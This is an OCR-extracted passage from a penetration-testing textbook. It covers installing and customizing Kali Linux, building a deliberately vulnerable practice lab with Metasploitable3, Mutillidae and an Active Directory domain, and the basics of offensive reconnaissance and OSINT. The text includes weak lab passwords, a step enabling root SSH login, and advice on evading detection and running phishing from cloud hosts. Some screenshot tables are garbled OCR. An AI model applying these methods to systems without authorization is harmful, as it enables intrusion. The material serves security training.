The next step to install the Kali-Linux to VMware is to click on Create a New Virtual machine and select Installer disc image file (iso). Browse your ISO file that was downloaded and then click Next. You can now enter the name of your choice (for example, HackBox) and select the Custom Location where you would like to store your VMware image. Click Next and then you'll specify the disk capacity. It is recommended that a minimum of 10 GB is needed to run Kali. Click Next until you finish.

Another way is to directly download the VMware image and open the .vmx file and select I copied it. That should boot up the fully loaded Kali Linux in VMware.

You can either choose to install the Kali-Linux to the host operating system or

run it as a live image. Once all of the installation steps are complete, you are ready to launch Kali Linux from VMware without any problem, as shown in the following screenshot:



VirtualBox

Similar to VMware workstation player, VirtualBox is the hypervisor that is completely open source and a free desktop application from which you can run any VM from the host operating system. This application can be downloaded from: https://www.virtualbox.org/wiki/Downloads.

We will now go ahead and install Kali to VirtualBox. Similar to VMware, we will just execute the downloaded executable until we have a successful installation of Oracle VirtualBox, as shown in the following screenshot:



During installation, it is recommended that the RAM be set to at least 1 or 2 GB, and that you create the virtual hard drive with a minimum of 10 GB to have no performance issues. After the final step, you should be able to load Kali Linux in VirtualBox, as shown in the following screenshot:



...

Con a con a fill Co Constant

Installing to a Docker Appliance

Docker is an open source project that is designed to automate the deployment of software containers and applications instantly. Docker also provides the additional abstraction and automation layer of operating system-level virtualization on Linux.

Docker is available for Windows, Mac, Linux, AWS (Amazon Web Services), and Azure. For Windows, Docker can be downloaded from: https://download.docker

After the Docker installation, it should be fairly simple to run Kali Linux by running the docker pull kalilinux/kali-linux-docker and docker run -t -i kalilinux/kali-linux-docker /bin/bash commands to confirm installation.

We should be able to run Kali Linux directly from Docker as shown in the following screenshot. Also, note that Docker utilizes the VirtualBox environment in the background. So, technically, it is a VM running on VirtualBox through the Docker appliance:

| 2) (Mandated System D) and not | - | | × |
|--|-----|-----|---|
| Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. | | | 1 |
| C:\Hackerbox>docker pull kalilinux/kali-linux-docker Using default tag: latest latest: Pulling from kalilinux/kali-linux-docker b2860afd831e: Pull complete 340395ad18db: Pull complete d4ecedcfaa73: Pull complete e5b4b7133863: Pull complete e5b4b7133863: Pull complete 45f74187929d: Pull complete 6e61dde25369: Pull complete 96dd93da002c: Pull complete dae364b40b0d: Pull complete c680ef1373da: Pull complete 261c33ef5c83: Pull complete 261c33ef5c83: Pull complete Digest: sha256:b89e91e9e08cbcfa1accb825522bee556fa4b50891fffd27f1d56292e70 Status: Downloaded newer image for kalilinux/kali-linux-docker:latest | 567 | dcc | |
| C:\Hackerbox> | | | |

Once the Docker download is complete, you can run the Docker image by running docker run -t -i kalilinux/kali-linux-docker /bin/bash. You should be able to

see what's shown in the following screenshot:

C:\Hackerbox>docker run -t -i kalilinux/kali-linux-docker /bin/bash root@593eba91b9bb:/# ls bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr root@593eba91b9bb:/#

Ensure that VT-X is enabled on your system BIOS and Hyper-V is enabled on Windows. Do note that enabling Hyper-V will disable VirtualBox, as shown in the following screenshot:



Ok Cancel

Kali on AWS Cloud

Amazon Web Services (AWS) provide Kali Linux as part of **Amazon Machine Interface (AMI)** and **Software as a Service (SaaS).** A penetration tester or hacker can utilize AWS to conduct penetration testing and more efficient phishing attacks. In this section, we will go through the steps to bring up the Kali Linux on AWS.

First, you'll need to have a valid AWS account. You can sign up by visiting the following URL: https://console.aws.amazon.com/console/home.

When we log in to the AWS account, we should be able to see all of the AWS services. Search for Kali Linux. You'll see the following as per the screenshot, ht tps://aws.amazon.com/marketplace/pp/B01M26MMTT:



The open source community has made it very simple to directly launch with preconfigured Kali Linux 2018.1 in the Amazon marketplace. The following URL will take us to a direct launch of Kali-Linux within a few minutes, https://aws.amaz on.com/marketplace/pp/B01M26MMTT. Follow the instructions and then you should be able to launch the instance by selecting Continue to Subscribe. This should take you to the following option to select as shown in the following screenshot. Finally, just click Launch:

| | KaB Linux noning or t2medue | |
|--|--------------------------------|--|
| oftware Version | Kəli Linux 2018.3 | a . |
| tegion | US East (N. Virgin | ia) |
| | | |
| hoose Action | | Choose this action to launch your configuration through the |
| Launch through EC2 Select a launch action | • | Choose this action to launch your configuration through the Amazon EC2 console. |
| Hoose Action Launch through EC2 Select a launch action Launch through EC2 | • | Choose this action to launch your configuration through the Amazon EC2 console. |

Before you launch Kali Linux 2018.3 from AWS, it is recommended that you create a new key pair as shown in the following screenshot:

Select an existing key pair or create a new key pair

A key pair consists of a **public key** that AWS stores, and a **private key file** that you store. Together, they allow you to connect to your instance securely. For Windows AMIs, the private key file is required to obtain the password used to log into your instance. For Linux AMIs, the private key file allows you to securely SSH into your instance.

Note: The selected key pair will be added to the set of keys authorized for this instance. Learn more about removing existing key pairs from a public AMI.

| Master | ringKali3 | |
|--------|-----------|-------------------|
| | | Download Key Pair |
| | | |

As usual, to use any AWS VM, you must create your own key pair in order to ensure the security of the environment. Then, you should be able to log in by entering the following command from your command shell. In order to use the private key to log in without the password, Amazon enforces the file permission to be tunneled. We will use the following commands to connect to the Kali Linux instance:

chmod 600 privatekey.pem ssh -i privatekey.pem ec2-user@amazon-dns-ip

The following screenshot depicts the successful usage of Kali on AWS:

```
t@kal1:-# chmod 400 MasteringKali3.pem
 oot%kali:~# ssh -i MasteringKali3.pem ec2-user%ec2-54-88-166-48.compute-1.amazonaws.com
Linux kali 4.17.0-kalil-amd64 #1 SMP Debian 4.17.8-1kalil (2018-07-24) x86 64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
  2-user@kali:-$ ifconfig
eth0: flags=4163<UP, BRCADCAST, RUNNING, MULTICAST> ntu 1500
       inet 172.31.24.28 netmask 255.255.240.0 broadcast 172.31.31.255
       inet6 fe80::ce8:9fff:fe19:321c prefixlen 64 scopeid 0x20<link>
       ether 0e:e8:9f:19:32:1c txqueuelen 1000 (Ethernet)
       RX packets 221 bytes 27819 (27.1 KiB)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 266 bytes 31157 (30.4 KiB)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
       inet 127.0.0.1 netmask 255.0.0.0
       inet6 ::1 prefixlen 128 scopeid 0x10<host>
       loop txqueuelen 1000 (Local Loopback)
       RX packets 4 bytes 156 (156.0 B)
       RX errors 0 dropped 0 overruns 0 frame 0
       TX packets 4 bytes 156 (156.0 B)
       TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```



All of the terms and conditions must be met in order to utilize AWS to perform penetration testing. Legal terms and conditions must be met before launching any attacks from the cloud host.

Organizing Kali Linux

Installation is just the beginning of the setup, as organizing Kali Linux is very important. In this section, we will deep dive into different ways of organizing the HackBox through customization.

Configuring and customizing Kali Linux

Kali is a framework that is used to complete a penetration test. However, the tester should never feel tied to the tools that have been installed by default or by the look and feel of the Kali desktop. By customizing Kali, a tester can increase the security of client data that is being collected and make it easier to do a penetration test.

Common customization made to Kali include the following:

- Resetting the root password
- Adding a non-root user
- Configuring network services and secure communications
- Adjusting network proxy settings
- Accessing the secure shell
- Speeding up Kali operations
- Sharing folders with MS Windows
- Creating encrypted folders

Resetting the root password

To change a user password, use the following command:

passwd root

You'll then be prompted to enter a new password, as shown in the following screenshot:



Adding a non-root user

Many of the applications provided in Kali must run with root-level privileges in order to function. Root-level privileges do possess a certain amount of risk; for example, mistyping a command or using the wrong command can cause applications to fail or even damage the system being tested. In some cases, it is preferable to test with user-level privileges. In fact, some applications force the use of lower-privilege accounts.

To create a non-root user, you can simply use the adduser command from the Terminal and follow the instructions that appear, as shown in the following screenshot:



Configuring network services and secure communications

The first step to ensure that we are able to access the network is to make sure that it has connectivity to either a wired or wireless network to support updates and communications.

You may need to obtain an IP address through **DHCP** (**Dynamic Host Configuration Protocol**) by appending network configuration and adding the Ethernet adapter:

```
# nano /etc/network/interfaces
iface eth0 inet dhcp
```

Once the network configuration file is appended, you should be able to bring up the *ifup* script to automatically assign the IP address as shown in the following screenshot:

root@kali:~# ifup eth0

```
Internet Systems Consortium DHCP Client 4.3.5
Copyright 2004-2016 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Listening on LPF/eth0/08:00:27:11:a8:61
Sending on LPF/eth0/08:00:27:11:a8:61
Sending on Socket/fallback
DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 5
DHCPREQUEST of 192.168.0.204 on eth0 to 255.255.255.255 port 67
DHCPREQUEST of 192.168.0.204 from 192.168.0.1
DHCPACK of 192.168.0.204 from 192.168.0.1
RTNETLINK answers: File exists
bound to 192.168.0.204 -- renewal in 395569 seconds.
```

In the case of a static IP, you can append the same network configuration file

with the following lines and quickly set up a static IP to your Kali Linux:

nano /etc/network/interfaces
iface eth0 inet static
address <your address>
netmask <subnet mask>
broadcast <broadcast mask>
gateway <default gateway>
nano /etc/resolv.conf
nameserver <your DNS ip> or <Google DNS (8.8.8.8)>

By default, Kali does not start with the DHCP service enabled. Doing so announces the new IP address to the network, and this may alert administrators about the presence of the tester. For some test cases, this may not be an issue, and it may be advantageous to have certain services start automatically during boot up. This can be achieved by entering the following commands:

```
update-rc.d networking defaults
/etc/init.d/networking restart
```

Kali installs with network services that can be started or stopped as required, including DHCP, HTTP, SSH, TFTP, and the VNC server. These services are usually invoked from the command line, however, some are accessible from the Kali menu.

Adjusting network proxy settings

Users located behind an authenticated or unauthenticated proxy connection must modify bash.bashrc and apt.conf. Both files are located in the /etc/ directory.

Edit the bash.bashrc file, as shown in the following screenshot, using a text editor to add the following lines to the bottom of the bash.bashrc file:



Replace proxyIP and port with your proxy IP address and port number respectively, and replace user and password with your authentication username and password. If there's no need to authenticate, write only the part following the @ symbol. Save and close the file.

Accessing the secure shell

To minimize detection by a target network during testing, Kali does not enable any externally listening network services. Some services, such as Secure Shell (SSH), are already installed. However, they must be enabled prior to use.

Kali comes preconfigured with default SSH keys. Before starting the SSH service, it's a good idea to disable the default keys and generate a unique keyset for use.

Move the default SSH keys to a backup folder, and then generate a new SSH keyset using the following command:

dpkg-reconfigure openssh-server

To confirm the SSH service is running, you can verify using the following command (service ssh status) as shown in the following screenshot:

| | TOD | t@kali: - | 000 |
|--|---|---|--------|
| File Edit View Search | h Teminal Help | | |
| root@kali:~# dp root@kali:~# se root@kali:~# ne Active Internet Proto Recv-Q Se PID/Program | kg-reconfigure openssh- rvice ssh start tstat -antp connections (servers a nd-Q Local Address name | server and established) Foreign Address | State |
| tcp 0 2786/sshd | 0 0.0.0.0:22 | 0.0.0:* | LISTEN |
| tcp6 0 2786/sshd rootgkali:~# | 0 :::22 | 111* | LISTEN |

Note that, with the default configuration of SSH, root login will be disabled. If you require access with the root account, you may have to edit /etc/ssh/sshd_config and set PermitRootLogin to yes, save, and then exit. Finally, from any system on the same network, you should be able to access the SSH service and utilize Kali Linux. In this example, we would use PuTTY, which is a free and portable SSH client for windows. Now you should be able to access the Kali Linux from another machine, accept the SSH certificate, and enter your credentials, as shown in the following screenshot: by any set of the set of the

Speeding up Kali operations

Several tools can be used to optimize and speed up Kali operations:

• When using a VM, install the VM's software drive package: Guest Additions (VirtualBox) or VMware Tools (VMware).



We have to ensure that we run apt-get update before the installation.

- When creating a VM, select a fixed disk size instead of one that is dynamically allocated. It is faster to add files to a fixed disk, and there is less file fragmentation.
- By default, Kali does not show all applications that are present in the start up menu. Each application that is installed during the boot up process slows the system data and may impact memory use and system performance. Install **Boot Up Manager** (**BUM**) to disable unnecessary services and applications that are enabled during the boot up (apt-get install bum), as shown in the following screenshot:

| | Boot-Up Manager | | 0 | ۲ | 0 |
|---------|---|---------|---|-----|---|
| File S | ervices Help | | | | |
| Activat | e Description | Running | | | 4 |
| 7 | 9df95d102d2b0aad5aff13603ef0cb3f lvm2-lvmetad | 2 | 1 | | |
| × | 8309d3e838caed8b87e6560e8951d182 thin | 2 | ŝ | | |
| × | 9df95d102d2b0aad5aff13603ef0cb3f lvm2-lvmpolld | 7 | | | |
| | c848721d4a6e6dbc698c36d06bf45ef9 uuidd | ? | | | |
| W | c25fbd9bcc88ab95bcc33eea4228fd42 rsyslog | 7 | | | |
| × | 9726217383c5d7c9454fe7d0db64bda2 speech-dispatcher | 7 | | | |
| | 40f2879e95ee03b8541cb267e0af1f29 pcscd | ? | | | |
| Apply | Advanced | | | Qui | t |

Sharing folders with the host operating system

The Kali toolset has the flexibility to share results with applications residing on different operating systems, especially Microsoft Windows. The most effective way to share data is to create a folder that is accessible from the host operating system as well as the Kali Linux VM guest.

When data is placed in a shared folder from either the host or the VM, it is immediately available via the shared folder to all systems that access that shared folder.

To create a shared folder, perform the following steps:

- 1. Create a folder on the host operating system. In this example, it will be called kali_Share.
- 2. Right-click on the folder and select the Sharing tab. From this menu, select Share.
- 3. Ensure that the file is shared with Everyone, and that Permission Level for this share is set to Read / Write.
- 4. If you haven't already done so, install the appropriate tools onto Kali Linux. For example, when using VMware, install the VMware tools.
- 5. When the installation is complete, go to the VMware player menu and select **Manage** and click Virtual Machine Settings. Find the menu that enables Shared Folders and select Always Enabled. Create a path to the shared folder that is present on the host operating system, as shown in the following screenshot:

| Partoware Operation | | 117-002-000-002-019 | |
|---|--|---|--|
| Settings | Surmary Kali-Linux-2018. Linux-and64 | Polder sharing Shared folders expose you writial mechine. The may | ur files to programs in the put your computer and |
| C Power Shared Folders Wiware Tools | Add Shared Folder Wizard Name the Shared Folder What would you like to call th | a shared folder? | × b folders if you ata |
| Autologin | Host path | | Jepend |
| | D: (Hacktools | Brows | 8 |
| | Name | | |
| | kai_share | | |
| | | | / Proventes |
| | | <back next=""> Ca</back> | mel |
| | - | | |

6. In the case of Oracle VirtualBox, select the VM and go to the Settings and select Shared Folders, as shown in the following screenshot:
| Control Control Sustain System Sys | · + Places + | Sun 21:27 | | # / |
|---|---|---|----------------------|-----|
| Name Add Share ? X Storage M Fidder Pati: DifHaddools Pidder Pati: DifHaddools Pidder Name: DifHaddools < | General System | Shared Folders Shared Folders | | |
| | Display Storage Aucio Network Serial Ports Usiti Shared Folders Uner Interface | Name ? X M Ni Felder Path: D:Haddools Folder Name: Kal_store! Read-only Ø Auto-mount Ø Make Permanent OK Cance | Auto-mount Access 40 | |

7. Run the mount-shared-folders.sh file from the Kali Linux desktop from your VirtualBox. Now the shared folder will be visible in mnt, as shown in the following screenshot:



8. Everything placed in the folder will be accessible in the folder of the same name on the host operating system and vice versa.

The shared folder, which will contain sensitive data from a penetration test, must be encrypted to protect the client's network and reduce the tester's liability should the data ever be lost or stolen.

Using Bash scripts to customize Kali

Typically, to maintain system and software development, command-line interfaces were developed as multiple shells in Linux, namely sh, bash, csh, tcsh, and ksh.

We can utilize the following Bash scripts to customize the Kali Linux depending upon the goal of our penetration testing: https://github.com/PacktPublishing/Mastering-Kali-Linux-for-Advanced-Penetration-Testing-Third-Edition/blob/master/Chapter%2001/lscript -master.zip.

Building a verification lab

As a penetration tester, it is recommended to set up your own verification lab to test any kind of vulnerabilities and have the right proof of concept before emulating the same on a live environment.

Installing defined targets

In order to practice the art of exploitation, it is always recommended to make use of the well-known vulnerable software. In this section, we will be installing Metasploitable3, which is a Windows platform, and Mutillidae, which is a PHP framework web application.

Metasploitable3

Metasploitable3 is an indubitable vulnerable VM that's intended to be tested for multiple exploits using Metasploit. It is under BSD-style license. Two VMs can be built for practice, which can be downloaded from: https://github.com/rapid7/meta sploitable3. You can download the ZIP file and unzip it in your favorite Windows location (typically, we segregate in the D:\HackTools\ folder) or you can git clone https://github.com/rapid7/metasploitable3 using Bash command. Install all of the relevant supporting software such as Packer (https://www.packer.io/downloads.html), Vagrant (https://www.vagrantup.com/downloads.html), VirtualBox, and the Vagrant reload plugin. The following commands should install all of the relevant vulnerable services and software:

• On Windows 10 as the host operating system, you can run the following commands:

./build.ps1 windows2008 ./build.ps1 ubuntu1404

• On Linux or macOS, you can run the following commands:

./build.sh windows2008 ./build.sh ubuntu1404

After the VirtualBox file download, you'll just have to run vagrant up win2k8 and vagrant up ub1404 in the same PowerShell. This should bring up your new VM in your VirtualBox without any problem as shown in the following screenshot:



Mutillidae

Mutillidae is an open source insecure web application, which is designed for penetration testers to practice all of the web-app specific vulnerability exploitation. XAMPP is another free and open source cross-platform web server solution stack package developed by Apache Friends. The XAMPP can be downloaded from: https://www.apachefriends.org/download.html.

We will now be installing the Mutillidae to our newly installed Microsoft windows 2008 R2 server to host it:

1. Once XAMPP is downloaded, let's go ahead and install the executable by following the wizard. Once the installation is complete and the XAMPP launched, you should be able to see the following screen. We will be using XAMPP version 5.6.36 / PHP 5.6.36:

| 🖾 Setup | | |
|---|--|--|
| bitna | ami for XAMPP | |
| Bitnami for XAM Drupal, Joomla apps on top of | IPP provides free installers th !, WordPress and many other your existing XAMPP installati | iat can install popular open source ion. |
| Learn More | | |
| | Installing | |
| Unpacking files | | |
| | | |
| | | |
| XAMPP Installer | | |
| | < Back | Cancel |

- 2. Mutillidae can be downloaded from: https://sourceforge.net/projects/mutillidae /files/latest/download.
- 3. Unzip the file and copy the folder to c:\yourxampplocation\htdocs\<mutillidae>.
- 4. You have to ensure XAMPP is running Apache and MySQL/MariaDB and finally access the .htacess file inside the mutillidae folder and ensure that 127.0.0.1 and the IP range are allowed. We should be able to see the web application installed successfully as shown in the following screenshot and it can be accessed by visiting http://localhost/mutillidae/:



In case of error messages saying that the database is offline or something similar, you may have to reset or set up the DB for Mutillidae.

Setting up an Active Directory and Domain Controller

In the previous edition of *Mastering Kali Linux for Advanced Penetration Testing*, we learned how to set up an Active Directory in Windows 2008 R2. In this section, we will install Active Directory on Windows 2008 R2. Once you've downloaded the ISO from Microsoft and installed the operating system on VMware workstation player or VirtualBox, you should be able to do the following steps:

- 1. Open the Server Manager from the taskbar.
- 2. From the Server Manager, click on Add roles and features.
- 3. Select Role-based or Features-based installation from the Installation Type screen and click Next.
- 4. By default, the same server will be selected.
- 5. From the Server Roles page place a checkmark in the checkbox next to Active Directory Domain Services. Additional roles, services, or features are also required to install Domain Services: click Add Features.
- 6. Select optional features to install during the AD DS installation by placing a check in the box next to any desired features, and then click Next, operating system compatibility checks, then select Create a new domain in a new format and click Next.
- 7. Enter the **FQDN** (**Fully Qualified Domain Name**). In the example, we will create a new FQDN as mastering.kali.thirdedition; that should take us to forest functional level. We can select Windows 2008 R2 and click Next; that will enable us to install the DNS (Domain Name System). During this installation, it is recommended to set a static IP to this machine so that the domain controller features can be enabled; in our case, we set the static IP of this server to 192.168.x.x. Finally, you'll need to set the Directory Services Restore mode administrator password; a summary of the configuration will be present.
- 8. On the Confirm installation selections screen, review the installation and then click Install.
- 9. Once everything is complete, you should be able to see the following screenshot:

| erver Mananer Active Directory Doma | in Services Installation Wizard |
|--|--|
| Active Directory Doma | Active Directory domain controller is assigned to the ste "Default First-Ste-Name". You can manage sites with the Active Directory Sites and Services administrative tool. |
| | |

Adding users to the Active Directory

To demonstrate the privilege escalation in later chapters, we will create a normal user with domain user privilege and a domain administrator user with full privileges.

To create a normal user on domain, run the following command in the command line on our Domain Controller:

net user normaluser Passw0rd12 /add /domain

To create a domain administrator account, the following commands will create a user as admin and add this user to the domain admins group:

|net user admin Passw0rd123 /add /domain |net group "domain admins" admin /add /domain

To validate these users are created, you can use the domain controller by simply running net user from the command line and you should be able to see the users, as shown in the following screenshot:



Adding Metasploitable3 Windows to the new domain

Now we will go back to the Metasaploitable3 Windows that we installed and add it to our newly created domain by following the steps:

- 1. Add the IP address of the domain controller to the DNS setting by editing the Ethernet adapter properties. This is to resolve the FQDN; Metasploitable3 will need to query the domain controller for the domain name resolution.
- 2. Click Start button and right click on My Computer and select Properties; under Computer name, Domain and Workgroup settings click on Change settings, that should pop up a system properties windows. On the window click, on Change.
- 3. Select the radio button from Workgroup to Domain and enter the domain name as shown in the following screenshot; in our case, the domain name is mastering.kali.thirdedition:

| ystem Properties | |
|---|--------------|
| omputer Name/Domain Changes | 1 |
| You can change the name and the membership of this computer. Changes might affect access to network resources. More information | computer |
| Computer name: | |
| metasploitable3-win2k8 | ľ |
| Full computer name: | thirdedition |
| metasploitable3-win2k8.Mastering.kali.thirdedition | |
| More | |
| Member of | nange |
| Domain: | |
| Mastering kali thirdedition | |
| C Workgroup: | |
| | |
| | |
| OK Cancel | |
| | |
| | Li |
| OK Cancel | Apply |

4. That should prompt you to enter the username and password, and we can login as either normaluser or admin that we created. Once authenticated, the system is connected the domain and any domain user will be able to log in to Metapsloitable3.

This should provide us with a wide range of exposure to multiple vulnerabilities

on the network:

- A vulnerable Windows 2008 R2 (Metasploitable3 server) that is connected to a domain (mastering.kali.thirdedition).
- A vulnerable web application hosted on a vulnerable Windows 2008 R2 Server (Metasploitable3)
- A vulnerable services Linux machine (Metasploitable3) running Ubuntu 14.04
- A domain controller with one domain admin and one normal user

Managing collaborative penetration testing using Faraday

One of the most difficult aspects of penetration testing is remembering to test all of the relevant parts of the network or system target or trying to remember whether the target was actually tested after the testing has been completed. In some cases, a single client may have multiple penetration testers performing scanning activities from multiple locations and management would like to have a single view. Faraday can provide a single view, assuming all of the penetration testers are able to ping each other on the same network or on the internet for external assessment.

Faraday is a multiuser penetration test **IDE** (**Integrated Development Environment**). It is designed for testers to distribute, index, and analyze all of the data that is generated during the process of a penetration testing or technical security audit to provide different views such as Management, Executive Summary, and Overall Issues lists.

This IDE platform is developed in Python by InfoByte and version 2.7.2 is installed by default in the latest version of Kali Linux. You can navigate from the menu Applications, click on 12-Reporting tools, and then click on Faraday IDE. That should open up the new workspace to be created by the testers, as shown in the following screenshot:

| | Faraday 2.7.2 | 000 |
|--------------------------|---|-----------------------|
| | 1 | 8 |
| 1 | Create New Workspace | |
| WTThere are no workspace | es available. You must create one to co | ntinue using Faraday. |
| AF Name | | |
| arag | | |
| | | |
| Description: | | baces |
| Description: | | baces fosts |
| Description: | | Cancel Daces |

Launching Faraday should be able to open up the Faraday shell console to us, as shown in the following screenshot:

| | Faraday 2.7.2 | | 0 | 0 0 |) |
|---|--|----------|----------|-----------|---|
| | 8 1 | | | 6 | |
| 1 | X | Search | a host l | by nam | |
| [faraday](hack |) kali# nmap -oX /root/.faraday/data/hack Nmap output- | Ho | sts | | |
| 6.9268338583.x hmxMcnAnGwVPOv Starting Nmap NSE: Loaded 43 Initiating ARP Scanning 192.1 Stats: 0:00:00 ng Scan ARP Ping Scan ng) Completed ARP Initiating Par Completed Para | nl -vv -sV -Pn 192.168.146.1 2>G1 tee -a tmp.pz9zBQlW 2JD0z42 7.70 (https://nmap.org) at 2018-07-08 19:38 EDT scripts for scanning. Ping Scan at 19:38 68.146.1 [1 port] elapsed; 0 hosts completed (0 up), 1 undergoing ARP Pi Timing: About 100.00% done; ETC: 19:38 (0:00:00 remaini Ping Scan at 19:38, 0.04s elapsed (1 total hosts) allel DNS resolution of 1 host. at 19:38 11el DNS resolution of 1 host. at 19:38 | 197 | 2.168.14 | 46.1 (0) | |
| Initiating SYN Scanning 192.1 | Stealth Scan at 19:38 68.146.1 [1000 ports] | ie | 170 | 55 | |
| Discovered ope | n port 139/tcp on 192.168.146.1 n port 135/tcp on 192.168.146.1 | Weeke | Tru | Herte | ì |
| [INFO]- 2018-07-0 [INFO]- 2018-07-0 [INFO]- 2018-07-0 [INFO]- 2018-07-0 | 8 19:37:32,841 - faraday.ModelController - Plugin Started: Nmap 8 19:37:32,843 - faraday.ModelController - Plugin Ended: Nmap 8 19:38:34,185 - faraday.ModelController - Plugin Started: Nmap 8 19:38:35,398 - faraday.ModelController - Plugin Ended: Nmap | T W BA | | | |
| Notifications: 0 | Workspace status: 1 hosts, 3 services, 0 vulnerabilities. Active workspace | ce: hack | Cont | flicts: O | |

One of the features of the application is that following any scanning that you or any other penetration testers in your team do, you'll be able to visualize the information by clicking on Faraday Web and you'll be able to see the following:

| (D H | 1013764 | dig # (# | | | | | | | | |
|------------|----------|------------------|--------------------|-----------|---------------|------------------------|------------------------------|----------------|-----|-----------|
| 6 m | 1278.0 | New planstow | 5355 | | | | 21 Q. Search | 0 1 | | |
| Mist. | Visited+ | Hoferone Securit | s Niel Line Nation | Noti Tora | Epot: Di Salo | oching 🔤 Sala Foruma 🔨 | Nethanter Nick Training @ Ge | entrop Started | | |
| 170 | u.m | W ² | | | | | | | | 0. |
| 0 | Hos | ts for hac | k (1) 🗖 marget | entities. | | | | 0110 | Zec | () derete |
| 自 | E | ere feperati | X-01 | 9 | | | | | | |
| | 1 | NAME | OPHEWEI | VANI | CHEDONTALL | os owned | LACTAGORIES | | | |
| a. | 12 | 2003063963 | 10. | - X | (6) | E respe | Armonie age | | | |
| | | 10 | i | 10 B | | | cia 1 | | | |
| | | | | | Farac | lav Web | | | | |



Faraday Web There is a limitation on the free version of Faraday for Community that can be utilized to visualize the whole list of issues in a single place.

Summary

In this chapter, we took a journey into different methodologies and goal-based penetration testing that help organizations to test themselves against real-time attacks. We learned how penetration testers can use Kali Linux in multiple different platforms to assess the security of data systems and networks. We've taken a quick look into installing Kali on different virtualized platforms and how we can run a Linux operating system on a Windows platform using Docker.

We've built our own verification lab, set up Active Directory Domain Services, and set up two different VMs on the same network, one of which is part of the Active Directory. Most importantly, we learned how to customize Kali to increase the security of our tools and the data that they collect. We're working to achieve the goal of making tools support our process, instead of the other way around!

In the next chapter (chapter 2, Open Source Intelligence and Passive Reconnaissance), we will learn how effectively we can master **Open Source Intelligence** (**OSINT**) to identify the vulnerable attack surfaces of our target and create customized username and password lists to facilitate more focused attacks, extract these details from the dark web, and use other exploits.

Open Source Intelligence and Passive Reconnaissance

Information gathering is the method of gathering all relevant information from publicly available sources, often referred to as **open source intelligence** (**OSINT**). Passive reconnaissance through OSINT occurs during the first step of the kill chain when conducting a penetration test, or an attack against a network or server target. An attacker will typically dedicate up to 75% of the overall work effort for a penetration test to reconnaissance, as it is this phase that allows the target to be defined, mapped, and explored for the vulnerabilities that will eventually lead to exploitation.

There are two types of reconnaissance:

- Passive reconnaissance (direct and indirect)
- Active reconnaissance

Generally, passive reconnaissance is concerned with analyzing information that is openly available, usually from the target itself or public sources online. On accessing this information, the tester or attacker does not interact with the target in an unusual manner—requests and activities will not be logged, or will not be traced directly to the tester. Therefore, passive reconnaissance is conducted first to minimize the direct contact that may signal an impending attack or to identify the attacker.

In this chapter, you will learn the principles and practices of passive reconnaissance, which include the following:

- Basic principles of reconnaissance
- OSINT
- Online resources and dark web search
- Using scripts to automatically gather OSINT data
- Obtaining user information
- Profiling users for password lists
- Using social media to extract words

Active reconnaissance, which involves direct interaction with the target, will be covered in *chapter 3*, *Active Reconnaissance of External and Internal Networks*.

Basic principles of reconnaissance

Reconnaissance, or recon, is the first step of the kill chain when conducting a penetration test or attack against a data target. This is conducted before the actual test or attack of a target network. The findings will give a direction as to where additional reconnaissance may be required, or the vulnerabilities to attack during the exploitation phase. Reconnaissance activities are segmented on a gradient of interactivity with the target network or device.

Passive reconnaissance does not involve any malicious direct interaction with the target network. The attacker's source IP address and activities are not logged (for example, a Google search for the target's email addresses). It is difficult, if not impossible, for the target to differentiate passive reconnaissance from normal business activities.

Passive reconnaissance is further divided into direct and indirect categories. Direct passive reconnaissance involves the normal interactions that occur when an attacker interacts with the target in an expected manner. For example, an attacker will log on to the corporate website, view various pages, and download documents for further study. These interactions are expected user activities, and are rarely detected as a prelude to an attack on the target. In indirect passive reconnaissance, there will be absolutely no interaction with the target organization.

Active reconnaissance involves direct queries or other interactions (for example, port scanning of the target network) that can trigger system alarms or allow the target to capture the attacker's IP address and activities. This information could be used to identify and arrest an attacker, or used during legal proceedings. Because active reconnaissance requires additional techniques for the tester to remain undetected, it will be covered in chapter 3, *Active Reconnaissance of External and Internal Networks*.

Penetration testers or attackers generally follow a process of structured information gathering, moving from a broad scope (the business and regulatory environments) to the very specific (user account data).

To be effective, testers should know exactly what they are looking for and how the data will be used before collection starts. Using passive reconnaissance and limiting the amount of data collected minimizes the risk of being detected by the target.

Open source intelligence

Generally, the first step in a penetration test or an attack is the collection of OSINT. This is the art of collecting information from public sources, particularly the internet. The amount of available information is considerable—most intelligence and military organizations are actively engaged in OSINT activities to collect information about their targets, and to guard against data leakage about them.

OSINT can be divided into two types: **offensive** and **defensive**. Offensive deals with harvesting all the data that are required to prepare an attack on the target, while defensive is art of collecting the data of previous breaches and any other security incidents relevant to the target that can be utilized to defend or protect themselves. The following diagram depicts a basic mind map for OSINT:



Offensive OSINT

The information that is targeted for collection is dependent on the initial goal of the penetration test. For example, if testers want to access personal health records, they will need the names and biographical information of relevant parties involved (third-party insurance companies, healthcare providers, head of IT operations in any industry, commercial suppliers, and so on), their usernames, and passwords. If the route of an attack involves social engineering, they may supplement this information with details that give credibility to the requests for information, such as:

- **Domain names**: Identification of targets for the attackers or penetration testers during an external scenario begins with domain names, which is the most crucial element of OSINT.
- **DNS reconnaissance and route mapping**: Once a tester has identified the target that has an online presence and contains items of interest, the next step is to identify the IP addresses and routes to the target. DNS reconnaissance is concerned with identifying who owns a particular domain or series of IP addresses (whois sorts of information, although this has changed a lot after General Data Protection Regulation), the DNS information defining the actual domain names and IP addresses assigned to the target, and the route between the penetration tester or the attacker and the final target.

This information gathering is semi-active—some of the information is available from freely available open sources, while other information is available from third parties such as DNS registrars. Although the registrar may collect IP addresses and data concerning requests made by the attacker, it is rarely provided to the end target. The information that could be directly monitored by the target, such as DNS server logs, is almost never reviewed or retained. Because the information needed can be queried using a defined systematic and methodical approach, its collection can be automated.

In the following sections, we will discuss how easy it would be to enumerate all the domain names just by using simple tools from Kali Linux.

Domain gathering using Sublist3r

